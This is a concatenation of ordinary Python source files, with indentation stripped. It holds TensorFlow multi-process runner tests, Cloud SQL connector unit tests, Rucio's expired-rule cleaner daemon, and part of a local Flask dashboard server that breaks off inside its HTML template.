std_stream_results)
self.assertIn('[worker-1]: index 1, iteration 0\n', std_stream_results)
self.assertIn('[worker-1]: index 1, iteration 9\n', std_stream_results)
def test_termination_and_start_single_process(self):
def fn():
for i in range(0, 10):
print(
'index {}, iteration {}'.format(self._worker_idx(), i), flush=True)
time.sleep(1)
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(num_workers=2),
return_output=True)
mpr.start()
time.sleep(3)
mpr.terminate('worker', 0)
mpr.start_single_process('worker', 0)
std_stream_results = mpr.join().stdout
# Worker 0 is terminated in the middle, but a new worker 0 is added, so it
# should still have iteration 9 printed. Moreover, iteration 0 of worker 0
# should happen twice.
self.assertLen(
[s for s in std_stream_results if 'index 0, iteration 0' in s], 2)
self.assertIn('[worker-0]: index 0, iteration 9\n', std_stream_results)
self.assertIn('[worker-1]: index 1, iteration 0\n', std_stream_results)
self.assertIn('[worker-1]: index 1, iteration 9\n', std_stream_results)
def test_streaming(self):
def fn():
for i in range(5):
logging.info('(logging) %s-%d, i: %d',
multi_worker_test_base.get_task_type(), self._worker_idx(),
i)
print(
'(print) {}-{}, i: {}'.format(
multi_worker_test_base.get_task_type(), self._worker_idx(), i),
flush=True)
time.sleep(1)
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=2, num_ps=2),
return_output=True)
mpr._dependence_on_chief = False
mpr.start()
mpr.start_single_process('worker', 2)
mpr.start_single_process('ps', 2)
mpr_result = mpr.join()
list_to_assert = mpr_result.stdout
for job in ['chief']:
for iteration in range(5):
self.assertTrue(
any('(logging) {}-0, i: {}'.format(job, iteration) in line
for line in list_to_assert))
self.assertTrue(
any('(print) {}-0, i: {}'.format(job, iteration) in line
for line in list_to_assert))
for job in ['worker', 'ps']:
for iteration in range(5):
for task in range(3):
self.assertTrue(
any('(logging) {}-{}, i: {}'.format(job, task, iteration) in line
for line in list_to_assert))
self.assertTrue(
any('(print) {}-{}, i: {}'.format(job, task, iteration) in line
for line in list_to_assert))
task = 3
self.assertFalse(
any('(logging) {}-{}, i: {}'.format(job, task, iteration) in line
for line in list_to_assert))
self.assertFalse(
any('(print) {}-{}, i: {}'.format(job, task, iteration) in line
for line in list_to_assert))
def test_start_in_process_as(self):
def fn():
for i in range(5):
logging.info('%s-%d, i: %d', multi_worker_test_base.get_task_type(),
self._worker_idx(), i)
time.sleep(1)
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1),
return_output=True)
def eval_func():
time.sleep(1)
mpr.start_single_process(task_type='evaluator', task_id=0)
eval_thread = threading.Thread(target=eval_func)
eval_thread.start()
mpr.start_in_process_as(as_task_type='chief', as_task_id=0)
eval_thread.join()
list_to_assert = mpr.join().stdout
for job in ['worker', 'evaluator']:
for iteration in range(5):
self.assertTrue(
any('{}-0, i: {}'.format(job, iteration) in line
for line in list_to_assert))
def test_terminate_all_does_not_ignore_error(self):
mpr = multi_process_runner.MultiProcessRunner(
fn_that_errors,
multi_worker_test_base.create_cluster_spec(num_workers=2),
return_output=True)
mpr.start()
time.sleep(60)
mpr.terminate_all()
with self.assertRaisesRegex(ValueError, 'This is an error.'):
mpr.join()
def test_barrier(self):
multi_process_runner.run(
fn_with_barrier,
cluster_spec=multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1),
)
def test_barrier_called_in_main_process(self):
with self.assertRaises(ValueError):
multi_process_runner.get_barrier()
def test_stdout_available_when_timeout(self):
def fn():
logging.info('something printed')
time.sleep(10000) # Intentionally make the test timeout.
with self.assertRaises(multi_process_runner.SubprocessTimeoutError) as cm:
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(num_workers=1),
return_output=True)
mpr.start()
mpr.join(timeout=60)
mpr.terminate_all()
list_to_assert = cm.exception.mpr_result.stdout
self.assertTrue(
any('something printed' in line for line in list_to_assert))
def test_seg_fault_raises_error(self):
if multi_process_runner.is_oss() or sys.version_info >= (3, 7):
self.skipTest('TODO(b/171004637): Failing in OSS and Python 3.7+')
def fn_expected_to_seg_fault():
ctypes.string_at(0) # Intentionally made seg fault.
with self.assertRaises(
multi_process_runner.UnexpectedSubprocessExitError) as cm:
multi_process_runner.run(
fn_expected_to_seg_fault,
multi_worker_test_base.create_cluster_spec(num_workers=1),
return_output=True)
self.assertIn('Subprocess worker-0 exited with exit code',
str(cm.exception))
list_to_assert = cm.exception.mpr_result.stdout
self.assertTrue(
any('Segmentation fault' in line for line in list_to_assert))
def test_seg_fault_in_chief_raises_error(self):
if multi_process_runner.is_oss() or sys.version_info >= (3, 7):
self.skipTest('TODO(b/171004637): Failing in OSS and Python 3.7+')
def fn_expected_to_seg_fault():
if multi_worker_test_base.get_task_type() == 'worker':
time.sleep(10000)
ctypes.string_at(0) # Intentionally made seg fault.
with self.assertRaises(
multi_process_runner.UnexpectedSubprocessExitError) as cm:
multi_process_runner.run(
fn_expected_to_seg_fault,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1),
return_output=True)
self.assertIn('Subprocess chief-0 exited with exit code',
str(cm.exception))
list_to_assert = cm.exception.mpr_result.stdout
self.assertTrue(
any('Segmentation fault' in line for line in list_to_assert))
def test_exit_code_is_reported_by_chief_subprocess(self):
def fn_expected_to_exit_with_20():
if multi_worker_test_base.get_task_type() == 'worker':
time.sleep(10000)
sys.exit(20)
mpr = multi_process_runner.MultiProcessRunner(
fn_expected_to_exit_with_20,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1))
mpr.start()
with self.assertRaisesRegex(
multi_process_runner.UnexpectedSubprocessExitError,
'Subprocess chief-0 exited with exit code 20'):
mpr.join()
def test_exit_code_is_reported_by_subprocess(self):
def fn_expected_to_exit_with_10():
sys.exit(10)
mpr = multi_process_runner.MultiProcessRunner(
fn_expected_to_exit_with_10,
multi_worker_test_base.create_cluster_spec(num_workers=1))
mpr.start()
with self.assertRaisesRegex(
multi_process_runner.UnexpectedSubprocessExitError,
'Subprocess worker-0 exited with exit code 10'):
mpr.join()
def test_auto_restart(self):
def fn(counter):
counter.value += 1
if counter.value == 1:
raise ValueError
manager = multi_process_runner.manager()
counter = manager.Value(int, 0)
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(num_workers=1),
args=(counter,),
auto_restart=True)
mpr.start()
mpr.join()
self.assertEqual(counter.value, 2)
def test_auto_restart_and_timeout(self):
def fn():
logging.info('Running')
time.sleep(1)
raise ValueError
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(num_workers=1),
auto_restart=True,
return_output=True)
mpr.start()
with self.assertRaises(ValueError) as cm:
mpr.join(timeout=10)
self.assertGreater(
sum(['Running' in msg for msg in cm.exception.mpr_result.stdout]), 1)
def test_auto_restart_and_chief(self):
# If the chief has exited with zero exit code, auto restart should stop
# restarting other tasks even if they fail.
def fn():
time.sleep(1)
if multi_worker_test_base.get_task_type() != 'chief':
raise ValueError
manager = multi_process_runner.manager()
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1),
auto_restart=True)
mpr.start()
with self.assertRaises(ValueError):
mpr.join(timeout=10)
def test_auto_restart_failure_immediate_after_restart(self):
# Test the case when worker-0 fails immediately after worker-1 restarts.
def fn():
time.sleep(5)
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(
has_chief=False, num_workers=2),
auto_restart=True)
mpr.start()
pid = mpr.get_process_id('worker', 1)
mpr.terminate('worker', 1)
while mpr.get_process_id('worker', 1) == pid:
time.sleep(0.1)
mpr.terminate('worker', 0)
mpr.join(timeout=20)
def test_auto_restart_terminate(self):
# Tasks terminated by the user should also be restarted.
def fn(counter):
counter.value += 1
if counter.value == 1:
time.sleep(100)
manager = multi_process_runner.manager()
counter = manager.Value(int, 0)
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(
has_chief=False, num_workers=1),
args=(counter,),
auto_restart=True)
mpr.start()
time.sleep(3)
mpr.terminate('worker', 0)
mpr.join(timeout=20)
self.assertEqual(counter.value, 2)
def test_error_reporting_overrides_timeout_reporting(self):
def fn():
if self._worker_idx() == 1:
time.sleep(10000)
raise ValueError('Worker 0 errored')
mpr = multi_process_runner.MultiProcessRunner(
fn, multi_worker_test_base.create_cluster_spec(num_workers=2))
mpr.start()
with self.assertRaisesRegex(
ValueError,
'Worker 0 errored'):
mpr.join(timeout=20)
def test_process_exists(self):
def fn():
time.sleep(100000)
mpr = multi_process_runner.MultiProcessRunner(
fn, multi_worker_test_base.create_cluster_spec(num_workers=1))
mpr.start()
self.assertTrue(mpr.process_exists('worker', 0))
mpr.terminate('worker', 0)
# Worker 0 should exit at some point, or else the test would time out.
while mpr.process_exists('worker', 0):
time.sleep(1)
def test_timeout_none(self):
if multi_process_runner.is_oss():
self.skipTest('Intentionally skipping longer test in OSS.')
def fn():
time.sleep(250)
raise ValueError('Worker 0 errored')
mpr = multi_process_runner.MultiProcessRunner(
fn, multi_worker_test_base.create_cluster_spec(num_workers=1))
mpr.start()
with self.assertRaisesRegex(ValueError, 'Worker 0 errored'):
mpr.join(timeout=None)
_global_pool = multi_process_runner.MultiProcessPoolRunner(
multi_worker_test_base.create_cluster_spec(num_workers=2))
class MultiProcessPoolRunnerTest(test.TestCase):
def test_same_process_across_runs(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec)
pid = runner.run(fn_that_returns_pid)
for _ in range(3):
self.assertAllEqual(runner.run(fn_that_returns_pid), pid)
def test_exceptions_in_sub_process(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec)
pid = runner.run(fn_that_returns_pid)
with self.assertRaisesRegex(ValueError, 'This is an error.'):
runner.run(fn_that_errors)
self.assertAllEqual(runner.run(fn_that_returns_pid), pid)
def test_tf_config(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec)
result = runner.run(fn_that_adds_task_type_in_return_data)
job_count_dict = {'worker': 2, 'chief': 1}
for data in result:
job_count_dict[data] -= 1
self.assertEqual(job_count_dict['worker'], 0)
self.assertEqual(job_count_dict['chief'], 0)
@unittest.expectedFailure
def test_exception_in_main_process(self):
# When there's an exception in the main process, __del__() is not called.
# This test is to verify MultiProcessPoolRunner can cope with __del__() not
# being called.
cluster_spec = multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec)
runner.run(fn_that_returns_pid)
raise ValueError('failure')
def test_initializer(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(
cluster_spec, initializer=lambda: fn_that_sets_global(1))
result = runner.run(fn_that_sets_global, args=(2,))
self.assertAllEqual(result, [1, 1])
def test_global_pool(self):
_global_pool.run(fn_that_does_nothing)
def test_nested_pool(self):
def fn():
# This runs in sub processes, so they are each using their own
# MultiProcessPoolRunner.
_global_pool.run(fn_that_does_nothing)
_global_pool.run(fn)
@combinations.generate(combinations.combine(required_physical_gpus=2))
class MultiProcessRunnerMultiGPUTest(test.TestCase, parameterized.TestCase):
def test_not_share_gpu(self):
num_gpus = len(context.context().list_physical_devices('GPU'))
if num_gpus != 2 and num_gpus != 4:
self.skipTest('requires 2 or 4 GPUs')
cluster_spec = multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1)
# Verify that CUDA_VISIBLE_DEVICES are different on each worker.
def cuda_visible_devices_fn():
return os.getenv('CUDA_VISIBLE_DEVICES')
runner = multi_process_runner.MultiProcessRunner(
cuda_visible_devices_fn, cluster_spec, share_gpu=False)
runner.start()
result = runner.join()
if num_gpus == 2:
self.assertAllEqual(sorted(result.return_value), ['0', '1'])
else:
self.assertAllEqual(sorted(result.return_value), ['0,2', '1,3'])
# Verify that CUDA_VISIBLE_DEVICES works.
def num_gpus_fn():
return len(context.context().list_physical_devices('GPU'))
runner = multi_process_runner.MultiProcessRunner(
num_gpus_fn, cluster_spec, share_gpu=False)
runner.start()
result = runner.join()
if num_gpus == 2:
self.assertAllEqual(result.return_value, [1, 1])
else:
self.assertAllEqual(result.return_value, [2, 2])
if __name__ == '__main__':
multi_process_runner.test_main()
|
test_instanceconnectionmanager_unit.py
|
""""
Copyright 2019 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pytest # noqa F401 Needed to run the tests
from google.cloud.sql.connector.InstanceConnectionManager import (
InstanceConnectionManager,
)
from google.cloud.sql.connector.utils import generate_keys
import asyncio
import os
import threading
import concurrent
import google.auth
import aiohttp
@pytest.fixture
def connect_string():
"""
Retrieves a valid connection string from the environment and
returns it.
"""
try:
connect_string = os.environ["INSTANCE_CONNECTION_NAME"]
except KeyError:
raise KeyError(
"Please set environment variable 'INSTANCE_CONNECTION"
+ "_NAME' to a valid Cloud SQL connection string."
)
return connect_string
@pytest.fixture
def async_loop():
"""
Creates a loop in a background thread and returns it to use for testing.
"""
loop = asyncio.new_event_loop()
thr = threading.Thread(target=loop.run_forever)
thr.start()
yield loop
loop.stop()
thr.join()
def test_InstanceConnectionManager_init(async_loop):
"""
Test to check whether the __init__ method of InstanceConnectionManager
can tell if the connection string that's passed in is formatted correctly.
"""
connect_string = "test-project:test-region:test-instance"
icm = InstanceConnectionManager(connect_string, async_loop)
project_result = icm._project
region_result = icm._region
instance_result = icm._instance
del icm
assert (
project_result == "test-project"
and region_result == "test-region"
and instance_result == "test-instance"
)
# def test_InstanceConnectionManager_wrong_connection_string():
# """
# Test to check whether the __init__() method of InstanceConnectionManager
# can tell if the connection string that's passed in is formatted correctly.
# """
# loop = asyncio.new_event_loop()
# thr = threading.Thread(target=loop.run_forever)
# thr.start()
# icm = None
# with pytest.raises(CloudSQLConnectionError):
# icm = InstanceConnectionManager("test-project:test-region", loop)
# del icm
@pytest.mark.asyncio
async def test_InstanceConnectionManager_get_ephemeral(connect_string):
"""
Test to check whether _get_ephemeral runs without problems given a valid
connection string.
"""
project = connect_string.split(":")[0]
instance = connect_string.split(":")[2]
credentials, project = google.auth.default()
credentials = credentials.with_scopes(
[
"https://www.googleapis.com/auth/sqlservice.admin",
"https://www.googleapis.com/auth/cloud-platform",
]
)
priv, pub_key = generate_keys()
async with aiohttp.ClientSession() as client_session:
result = await InstanceConnectionManager._get_ephemeral(
client_session, credentials, project, instance, pub_key.decode("UTF-8")
)
result = result.split("\n")
assert (
result[0] == "-----BEGIN CERTIFICATE-----"
and result[len(result) - 1] == "-----END CERTIFICATE-----"
)
@pytest.mark.asyncio
async def test_InstanceConnectionManager_get_metadata(connect_string):
"""
    Test to check whether _get_metadata runs without problems given a valid
connection string.
"""
project = connect_string.split(":")[0]
instance = connect_string.split(":")[2]
credentials, project = google.auth.default()
credentials = credentials.with_scopes(
[
"https://www.googleapis.com/auth/sqlservice.admin",
"https://www.googleapis.com/auth/cloud-platform",
]
)
priv, pub_key = generate_keys()
async with aiohttp.ClientSession() as client_session:
result = await InstanceConnectionManager._get_metadata(
client_session, credentials, project, instance
)
assert result["ip_addresses"] is not None and isinstance(
result["server_ca_cert"], str
)
def test_InstanceConnectionManager_perform_refresh(async_loop, connect_string):
"""
    Test to check whether _perform_refresh works as described given valid
conditions.
"""
icm = InstanceConnectionManager(connect_string, async_loop)
fut = icm._perform_refresh()
del icm
assert isinstance(fut, concurrent.futures.Future)
|
cleaner.py
|
# Copyright 2013-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2013-2016
# - Mario Lassnig <mario.lassnig@cern.ch>, 2013-2015
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013
# - Vincent Garonne <vgaronne@gmail.com>, 2014-2018
"""
Judge-Cleaner is a daemon to clean expired replication rules.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from copy import deepcopy
from datetime import datetime, timedelta
from re import match
from random import randint
from sqlalchemy.exc import DatabaseError
from rucio.common.config import config_get
from rucio.common.exception import DatabaseException, UnsupportedOperation, RuleNotFound
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.rule import delete_rule, get_expired_rules
from rucio.core.monitor import record_counter
from rucio.db.sqla.util import get_db_time
graceful_stop = threading.Event()
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def rule_cleaner(once=False):
"""
Main loop to check for expired replication rules
"""
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
paused_rules = {} # {rule_id: datetime}
# Make an initial heartbeat so that all judge-cleaners have the correct worker number on the next try
live(executable='rucio-judge-cleaner', hostname=hostname, pid=pid, thread=current_thread)
graceful_stop.wait(1)
while not graceful_stop.is_set():
try:
# heartbeat
heartbeat = live(executable='rucio-judge-cleaner', hostname=hostname, pid=pid, thread=current_thread)
start = time.time()
# Refresh paused rules
iter_paused_rules = deepcopy(paused_rules)
for key in iter_paused_rules:
if datetime.utcnow() > paused_rules[key]:
del paused_rules[key]
rules = get_expired_rules(total_workers=heartbeat['nr_threads'] - 1,
worker_number=heartbeat['assign_thread'],
limit=200,
blacklisted_rules=[key for key in paused_rules])
logging.debug('rule_cleaner[%s/%s] index query time %f fetch size is %d' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, time.time() - start, len(rules)))
if not rules and not once:
logging.debug('rule_cleaner[%s/%s] did not get any work (paused_rules=%s)' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, str(len(paused_rules))))
graceful_stop.wait(60)
else:
for rule in rules:
rule_id = rule[0]
rule_expression = rule[1]
logging.info('rule_cleaner[%s/%s]: Deleting rule %s with expression %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id, rule_expression))
if graceful_stop.is_set():
break
try:
start = time.time()
delete_rule(rule_id=rule_id, nowait=True)
logging.debug('rule_cleaner[%s/%s]: deletion of %s took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id, time.time() - start))
except (DatabaseException, DatabaseError, UnsupportedOperation), e:
if match('.*ORA-00054.*', str(e.args[0])):
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(600, 2400))
record_counter('rule.judge.exceptions.LocksDetected')
logging.warning('rule_cleaner[%s/%s]: Locks detected for %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id))
elif match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.error(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except RuleNotFound, e:
pass
except (DatabaseException, DatabaseError), e:
if match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except Exception, e:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
if once:
break
die(executable='rucio-judge-cleaner', hostname=hostname, pid=pid, thread=current_thread)
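# Added note (commentary, not part of the original daemon): when delete_rule()
# hits a row-lock conflict (Oracle error ORA-00054), the rule id is parked in
# paused_rules with a random 10-40 minute cool-down and passed back to
# get_expired_rules() via blacklisted_rules, so a contended rule is skipped on
# the following iterations instead of blocking the whole worker.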
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1):
"""
Starts up the Judge-Clean threads.
"""
client_time, db_time = datetime.utcnow(), get_db_time()
max_offset = timedelta(hours=1, seconds=10)
if db_time - client_time > max_offset or client_time - db_time > max_offset:
logging.critical('Offset between client and db time too big. Stopping Cleaner')
return
hostname = socket.gethostname()
sanity_check(executable='rucio-judge-cleaner', hostname=hostname)
if once:
rule_cleaner(once)
else:
logging.info('Cleaner starting %s threads' % str(threads))
threads = [threading.Thread(target=rule_cleaner, kwargs={'once': once}) for i in xrange(0, threads)]
[t.start() for t in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
dashboard.py
|
# Copyright (c) 2019 Microsoft Corporation
# Distributed under the MIT software license
# TODO: Dashboard needs to be tested.
from IPython import display
import re
import requests
import threading
import os
from . import udash
from gevent.pywsgi import WSGIServer
from flask import Flask
import socket
import random
from string import Template
import logging
log = logging.getLogger(__name__)
app = Flask(__name__)
app.logger.disabled = True
def _build_path(path, base_url=None):
if base_url:
return "{0}/{1}".format(base_url, path)
else:
return path
class AppRunner:
def __init__(self, addr=None, base_url=None, use_relative_links=False):
self.app = DispatcherApp(
base_url=base_url, use_relative_links=use_relative_links
)
self.base_url = base_url
self.use_relative_links = use_relative_links
self._thread = None
if addr is None:
# Allocate port
self.ip = "127.0.0.1"
self.port = -1
max_attempts = 10
for _ in range(max_attempts):
port = random.randint(7000, 7999)
if self._local_port_available(port, rais=False):
self.port = port
log.info("Found open port: {0}".format(port))
break
else: # pragma: no cover
log.info("Port already in use: {0}".format(port))
else: # pragma: no cover
msg = """Could not find open port.
Consider calling `interpret.set_show_addr(("127.0.0.1", 7001))` first.
"""
log.error(msg)
raise RuntimeError(msg)
else:
self.ip = addr[0]
self.port = addr[1]
def _local_port_available(self, port, rais=True):
"""
Borrowed from:
https://stackoverflow.com/questions/19196105/how-to-check-if-a-network-port-is-open-on-linux
"""
try:
backlog = 5
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("127.0.0.1", port))
sock.listen(backlog)
sock.close()
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
sock.bind(("::1", port))
sock.listen(backlog)
sock.close()
except socket.error: # pragma: no cover
if rais:
raise RuntimeError(
"The server is already running on port {0}".format(port)
)
else:
return False
return True
def stop(self):
# Shutdown
if self._thread is None:
return True
log.info("Triggering shutdown")
try:
path = _build_path("shutdown")
url = "http://{0}:{1}/{2}".format(self.ip, self.port, path)
r = requests.post(url)
log.debug(r)
except requests.exceptions.RequestException as e: # pragma: no cover
log.info("Dashboard stop failed: {0}".format(e))
return False
if self._thread is not None:
self._thread.join(timeout=5.0)
if self._thread.is_alive():
log.error("Thread still alive despite shutdown called.")
return False
self._thread = None
return True
def _run(self):
try:
class devnull:
write = lambda _: None # noqa: E731
server = WSGIServer((self.ip, self.port), self.app, log=devnull)
self.app.config["server"] = server
server.serve_forever()
except Exception as e: # pragma: no cover
log.error(e, exc_info=True)
def _obj_id(self, obj):
return str(id(obj))
def start(self):
log.info("Running app runner on: {0}:{1}".format(self.ip, self.port))
self._thread = threading.Thread(target=self._run, daemon=True)
self._thread.start()
def ping(self):
""" Returns true if web service reachable, otherwise False."""
try:
path = _build_path("")
url = "http://{0}:{1}/{2}".format(self.ip, self.port, path)
requests.get(url)
log.info("Dashboard ping succeeded")
return True
except requests.exceptions.RequestException as e: # pragma: no cover
log.info("Dashboard ping failed: {0}".format(e))
return False
def status(self):
status_dict = {}
status_dict["addr"] = self.ip, self.port
status_dict["base_url"] = self.base_url
status_dict["use_relative_links"] = self.use_relative_links
status_dict["thread_alive"] = self._thread.is_alive() if self._thread else False
http_reachable = self.ping()
status_dict["http_reachable"] = http_reachable
return status_dict
def register(self, ctx, **kwargs):
# The path to this instance should be id based.
self.app.register(ctx, **kwargs)
def display_link(self, ctx):
obj_path = self._obj_id(ctx) + "/"
path = (
obj_path
if self.base_url is None
else "{0}/{1}".format(self.base_url, obj_path)
)
start_url = (
"/"
if self.use_relative_links
else "http://{0}:{1}/".format(self.ip, self.port)
)
url = "{0}{1}".format(start_url, path)
log.info("Display URL: {0}".format(url))
return url
def display(self, ctx, width="100%", height=800, open_link=False):
url = self.display_link(ctx)
html_str = "<!-- {0} -->\n".format(url)
if open_link:
html_str += r'<a href="{url}" target="_new">Open in new window</a>'.format(
url=url
)
html_str += """<iframe src="{url}" width={width} height={height} frameBorder="0"></iframe>""".format(
url=url, width=width, height=height
)
display.display_html(html_str, raw=True)
return None
class DispatcherApp:
def __init__(self, base_url=None, use_relative_links=False):
self.base_url = base_url
self.use_relative_links = use_relative_links
self.root_path = "/"
self.shutdown_path = "/shutdown"
self.favicon_path = "/favicon.ico"
self.favicon_res = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "assets", "favicon.ico"
)
self.default_app = Flask(__name__)
self.pool = {}
self.config = {}
if self.base_url is None:
self.app_pattern = re.compile(r"/?(.+?)(/|$)")
else:
self.app_pattern = re.compile(
r"/?(?:{0}/)?(.+?)(/|$)".format(self.base_url)
)
def obj_id(self, obj):
return str(id(obj))
def register(self, ctx, share_tables=None):
ctx_id = self.obj_id(ctx)
if ctx_id not in self.pool:
log.info("Creating App Entry: {0}".format(ctx_id))
ctx_path = (
"/{0}/".format(ctx_id)
if self.base_url is None
else "/{0}/{1}/".format(self.base_url, ctx_id)
)
app = udash.generate_app(
ctx,
{"share_tables": share_tables},
# url_base_pathname=ctx_path,
requests_pathname_prefix=ctx_path,
routes_pathname_prefix=ctx_path,
)
app.css.config.serve_locally = True
app.scripts.config.serve_locally = True
self.pool[ctx_id] = app.server
else:
log.debug("App Entry found: {0}".format(ctx_id))
def __call__(self, environ, start_response):
path_info = environ.get("PATH_INFO", "")
script_name = environ.get("SCRIPT_NAME", "")
log.debug("PATH INFO : {0}".format(path_info))
log.debug("SCRIPT NAME: {0}".format(script_name))
try:
if path_info == self.root_path:
log.info("Root path requested.")
start_response("200 OK", [("content-type", "text/html")])
content = self._root_content()
return [content.encode("utf-8")]
if path_info == self.shutdown_path:
log.info("Shutting down.")
server = self.config["server"]
server.stop()
start_response("200 OK", [("content-type", "text/html")])
return ["Shutdown".encode("utf-8")]
if path_info == self.favicon_path:
log.info("Favicon requested.")
start_response("200 OK", [("content-type", "image/x-icon")])
with open(self.favicon_res, "rb") as handler:
return [handler.read()]
match = re.search(self.app_pattern, path_info)
log.debug("App pattern match: {0}".format(match))
if match is None or self.pool.get(match.group(1), None) is None:
msg = "URL not supported: {0}".format(path_info)
log.error(msg)
start_response("400 BAD REQUEST ERROR", [("content-type", "text/html")])
return [msg.encode("utf-8")]
ctx_id = match.group(1)
log.info("Routing request: {0}".format(ctx_id))
app = self.pool[ctx_id]
if self.base_url and not environ["PATH_INFO"].startswith(
"/{0}".format(self.base_url)
):
log.info("No base url in path. Rewrite to include in path.")
environ["PATH_INFO"] = "/{0}{1}".format(
self.base_url, environ["PATH_INFO"]
)
return app(environ, start_response)
except Exception as e: # pragma: no cover
log.error(e, exc_info=True)
try:
start_response(
"500 INTERNAL SERVER ERROR", [("Content-Type", "text/plain")]
)
except Exception:
pass
return [
"Internal Server Error caught by Dispatcher. See logs if available.".encode(
"utf-8"
)
]
def _root_content(self):
body = r"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Backend Server</title>
</head>
<style>
body {
background-color: white;
margin: 0;
padding: 0;
min-height: 100vh;
}
.banner {
height: 65px;
margin: 0;
padding: 0;
background-color: rgb(20, 100, 130);
box-shadow: rgba(0, 0, 0, 0.1) 1px 2px 3px 0px;
}
.banner h2{
color: white;
margin-top: 0px;
padding: 15px 0;
text-align: center;
font-family: Georgia, Times New Roman, Times, serif;
}
.app {
background-color: rgb(245, 245, 250);
min-height: 100vh;
overflow: hidden;
}
.card-header{
padding-top: 12px;
padding-bottom: 12px;
padding-left: 20px;
padding-right: 20px;
position: relative;
line-height: 1;
border-bottom: 1px solid #eaeff2;
background-color: rgba(20, 100, 130, 0.78);
}
.card-body{
padding-top: 30px;
padding-bottom: 30px;
position: relative;
padding-left: 20px;
padding-right: 20px;
}
.card-title{
display: inline-block;
margin: 0;
color: #ffffff;
}
.card {
border-radius: 3px;
background-color: white;
box-shadow: 0 2px 6px rgba(0, 0, 0, 0.08);
border: 1px solid #d1d6e6;
margin: 30px 20px;
}
.link-container {
text-align: center;
}
.link-container ul {
display: inline-block;
margin: 0px;
padding: 0px;
}
.link-container li {
display: block;
padding: 15px;
}
.center {
position: absolute;
left: 50%;
top: 50%;
-webkit-transform: translate(-50%, -50%);
transform: translate(-50%, -50%);
}
</style>
<body>
<div class="app">
<div class="banner"><h2>Backend Server</h2></div>
<div class="card">
<div class="card-header">
<div class="card-title"><div class="center">Active Links</div></div>
</div>
<div class="card-body">
<div class="link-container">
<ul>
$list
</ul>
</div>
</div>
</div>
</div>
